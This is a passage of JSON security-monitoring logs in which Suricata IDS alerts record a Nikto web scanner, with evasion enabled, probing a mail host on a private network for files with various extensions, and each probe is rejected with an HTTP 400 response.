(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.490695+0000","flow_id":"2040551831140588.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47032","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.gz","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.497254+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":49,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.79935","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.497254+0000\",\"flow_id\":119434434482673,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47034,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.xtp\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.497254+0000","flow_id":"119434434482673.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47034","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.xtp","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.500145+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":50,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.81471","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.500145+0000\",\"flow_id\":833747625352614,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47036,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.iso2022-kr\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.500145+0000","flow_id":"833747625352614.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47036","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.iso2022-kr","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.502204+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":51,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.83021","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.502204+0000\",\"flow_id\":1034666195461575,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47038,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.bat\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.502204+0000","flow_id":"1034666195461575.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47038","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.bat","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.504875+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":52,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.84559","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.504875+0000\",\"flow_id\":565587047264595,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47040,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.asa\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.504875+0000","flow_id":"565587047264595.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47040","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.asa","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.506877+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":53,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.86095","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.506877+0000\",\"flow_id\":1776793594542443,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47042,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.PRINT\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.506877+0000","flow_id":"1776793594542443.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47042","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.PRINT","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.509502+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":54,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.87637","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.509502+0000\",\"flow_id\":43357678780300,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47044,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.inc\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.509502+0000","flow_id":"43357678780300.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47044","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.inc","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.511939+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":55,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.89171","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.511939+0000\",\"flow_id\":111342716111856,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47046,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.ee\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.511939+0000","flow_id":"111342716111856.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47046","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.ee","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.522439+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":56,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.90705","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.522439+0000\",\"flow_id\":22535677342666,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47048,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.gif\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.522439+0000","flow_id":"22535677342666.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47048","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.gif","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.525182+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":57,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.92239","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.525182+0000\",\"flow_id\":1801949218013082,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47050,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.tmp\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.525182+0000","flow_id":"1801949218013082.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47050","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.tmp","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.527247+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":58,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.93777","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.527247+0000\",\"flow_id\":46888141850715,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47052,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.CGI\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.527247+0000","flow_id":"46888141850715.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47052","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.CGI","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.529238+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":59,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.95311","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.529238+0000\",\"flow_id\":314112417075197,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47054,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.ASP\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.529238+0000","flow_id":"314112417075197.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47054","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.ASP","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.531898+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":60,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.96847","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.531898+0000\",\"flow_id\":484214596835423,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47056,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.cnf\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.531898+0000","flow_id":"484214596835423.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47056","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.cnf","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.534133+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":61,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.98383","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.534133+0000\",\"flow_id\":987915476410983,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47058,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.config~\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.534133+0000","flow_id":"987915476410983.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47058","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.config~","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.536596+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":62,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.99927","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.536596+0000\",\"flow_id\":830771212987548,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47060,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.vts\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.536596+0000","flow_id":"830771212987548.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47060","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.vts","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.538865+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":63,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.101463","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.538865+0000\",\"flow_id\":2145323263342098,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47062,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.bak\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.538865+0000","flow_id":"2145323263342098.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47062","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.bak","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.541676+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant 